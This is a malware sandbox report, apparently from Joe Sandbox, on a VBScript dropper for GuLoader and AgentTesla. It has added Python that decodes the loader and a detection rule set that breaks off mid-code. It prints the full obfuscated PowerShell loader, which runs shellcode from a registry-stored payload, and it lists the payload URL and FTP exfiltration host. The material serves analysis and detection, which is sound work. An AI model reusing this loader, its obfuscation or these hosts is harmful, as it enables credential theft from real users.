Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name:PO-09784893 xlsx.vbs
Analysis ID:755440
MD5:bfa859d9ad7b23d3606ea13f525065a7
SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 1232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 4760 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 416 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh 
TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 7836 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
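
The powershell.exe command line in the process tree above carries its own decoder: Thwartness4 keeps every third character of its input, starting at offset 2, and discards the two filler characters in between, so the literal 'UdIReEDiXSk ' becomes IEX and the decoded $Saudiarabiske string is what gets invoked. The Python below is an added example, not part of the Joe Sandbox report or of the sample itself; it ports the decoder and runs it on two excerpts copied from that command line (the opening and closing portions of $Saudiarabiske). Its one assumption, marked in the code, is how the logged quoting resolves: each backtick-plus-three-quotes run is one literal double quote and each backtick-dollar is one dollar sign, so both collapse to a single character before the stride-3 pick.

```python
"""Decoder for the stride-3 string obfuscation in the powershell.exe command
line above (added example; not part of the Joe Sandbox report). The script's
Thwartness4 function keeps $HS.Substring($i, 1) for $i = 2, 5, 8, ... while
$i -lt $HS.Length-1: every third character is real, the other two are filler."""
import re

# Copied verbatim from the command line in the process tree.
IEX_BLOB = "UdIReEDiXSk "   # the literal passed to Thwartness4 first
HEAD = (  # opening part of $Saudiarabiske (the report shows the full 5 KB string)
    r"KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'Dru"
    r"BlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiu"
    r"HenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelSti"
    r"hocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce "
    r'Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]'
    r"BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGRee"
    r"AftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa("
)
TAIL = (  # closing part of $Saudiarabiske, after the C# class body
    r"Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWos"
    r"Ar1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,"
    r"Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCie"
    r"NemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUot"
    r"PsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBae"
    r"SulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy "
    r"Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMue"
    r"Re6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe."
    r"crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVer"
    r"GosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,"
    r"Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrs"
    r"Ad.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPim"
    r"FrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3"
    r"Bi,be Kr0De)rh#Te;"
)

ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"""(.*?)""";', re.S)   # $Var = """...""";
LITERAL_RE = re.compile(r"Thwartness4 '([^']*)'")            # Thwartness4 '...'


def ps_unescape(s: str) -> str:
    """Assumption, not stated in the report: in the logged command line each
    backtick-plus-three-quotes run is one literal quote once argument parsing
    is done, and backtick-dollar is PowerShell's escaped dollar, so both
    collapse to one character before the stride-3 pick."""
    return s.replace('`"""', '"').replace("`$", "$")


def thwartness4(blob: str) -> str:
    """Faithful port, including the loop bound ($i -lt Length-1), which drops
    the last real character when the input length is a multiple of three."""
    blob = ps_unescape(blob)
    return blob[2:len(blob) - 1:3]


def decode_excerpt(blob: str) -> str:
    """Same pick without the end bound, for a fragment cut from the middle of
    the string; the fragment has to start on a 3-character boundary."""
    return ps_unescape(blob)[2::3]


def split_stage(cmdline: str) -> dict:
    """Extract the variable blob and the quoted literal from a command line
    shaped like the one in the report."""
    found = {}
    m = ASSIGN_RE.search(cmdline)
    if m:
        found["variable"], found["blob"] = m.group(1), m.group(2)
    literals = LITERAL_RE.findall(cmdline)
    if literals:
        found["literal"] = literals[0]
    return found


def api_calls(decoded: str) -> list:
    """The calls that tell the triage story, in order of appearance."""
    names = ("DllImport", "VirtualAlloc", "Get-ItemProperty", "FromBase64String",
             "Marshal]::Copy", "EnumSystemLocalesW")
    return [n for _, n in sorted((decoded.find(n), n) for n in names if n in decoded)]


# Constructed stand-in for the real 5.5 KB command line: same layout, HEAD in
# place of the full string.
SAMPLE_CMDLINE = (
    '$Saudiarabiske = """' + HEAD + '""";Function Thwartness4 { param([String]$HS); '
    "For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); }"
    " $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';"
    "$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;"
)

if __name__ == "__main__":
    parts = split_stage(SAMPLE_CMDLINE)
    print(thwartness4(parts["literal"]))        # IEX
    print(decode_excerpt(parts["blob"]))        # Add-Type -TypeDefinition 'using System;...
    print(decode_excerpt(TAIL))                 # VirtualAlloc ... EnumSystemLocalesW(...)
    print(api_calls(decode_excerpt(TAIL)))
```

Run as a script it prints IEX, then the decoded head (Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]...), then the closing statements: VirtualAlloc(0,1048576,12288,64) (1 MB; 12288 is 0x3000, MEM_COMMIT|MEM_RESERVE; 64 is 0x40, PAGE_EXECUTE_READWRITE), a Get-ItemProperty read of HKCU:\Treetise\Fejltolkningens160, FromBase64String, Marshal]::Copy into the buffer, and EnumSystemLocalesW($Thwartness3, 0), which runs the buffer as the enumeration callback. The run-time Add-Type is what produces the csc.exe and cvtres.exe children under PID 416 in the tree.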
Source | Rule | Description | Author
PO-09784893 xlsx.vbs | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth
Strings:
  • 0xa39:$s1: .CreateObject("WScript.Shell")
  • 0x3fe57:$p1: powershell.exe
  • 0x4d288:$p1: powershell.exe
Source | Rule | Description | Author
00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: powershell.exe PID: 416 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
  • 0x289c:$b2: ::FromBase64String(
  • 0x14ef1e:$b2: ::FromBase64String(
  • 0x17a50f:$b2: ::FromBase64String(
  • 0x3712a:$s1: -join
  • 0x378df:$s1: -join
  • 0x1394bb:$s1: -join
  • 0x13b34b:$s1: -join
  • 0x165625:$s1: -join
  • 0x1d371a:$s1: -join
  • 0x1e07ef:$s1: -join
  • 0x1e3bc1:$s1: -join
  • 0x1e4273:$s1: -join
  • 0x1e5d64:$s1: -join
  • 0x1e7f6a:$s1: -join
  • 0x1e8791:$s1: -join
  • 0x1e9001:$s1: -join
  • 0x1e973c:$s1: -join
  • 0x1e976e:$s1: -join
  • 0x1e97b6:$s1: -join
  • 0x1e97d5:$s1: -join
  • 0x1ea025:$s1: -join
  • (2 further entries not shown)

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-... (obfuscated command line of PID 416; reproduced in full in the process tree above)
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png | Avira URL Cloud: Label: malware
Source: ftp.mcmprint.net | VirusTotal: Detection: 9%
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 185.31.121.136
Source: global traffic | HTTP traffic detected:
  GET /wp-admin/includes/yyXYRRIJkuolPn153.fla HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: b3solutionscws.com
  Cache-Control: no-cache
Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49819 (server banner):
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 1 of 50 allowed.
  220-Local time is now 19:48. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://OowQOv.com
Source: CasPol.exe, 0000000B.00000002.6743714275.000000001C260000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://hWFpSCunbgPMSZDs.net
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBPl
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2622363726.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: b3solutionscws.com

System Summary

Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-... (obfuscated command line of PID 416; reproduced in full in the process tree above)
Source: Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5576
Source: PO-09784893 xlsx.vbs, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
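
The process-creation evidence above (wscript.exe starting powershell.exe with a 5576-byte command line, then csc.exe compiling from the user's Temp directory and caspol.exe under that same powershell.exe) is what a process-tree rule set should catch, and the report's Sigma hit "Dot net compiler compiles file from suspicious location" covers one link of it. The Python below is an added example, not part of the Joe Sandbox report: it evaluates four per-event rules over Sysmon-style Event ID 1 records and then correlates them per parent so the whole chain fires as one alert. The records are constructed to mirror the tree (PIDs and image paths taken from the report; the long command line stood in for by filler of comparable size; the parent PID of wscript.exe and the two benign control records at the end are invented). The rule names, the 4096-byte threshold and the directory and host lists are choices made for this example, not values from the report.

```python
"""Process-creation rules for the chain recorded in this report (added example,
not part of the Joe Sandbox report). Input is the handful of Sysmon Event ID 1
fields the rules need; the records below mirror the process tree above."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


# Tuning choices made for this example (not values from the report):
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LONG_CMDLINE = 4096                       # the report shows "Commandline size = 5576"
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
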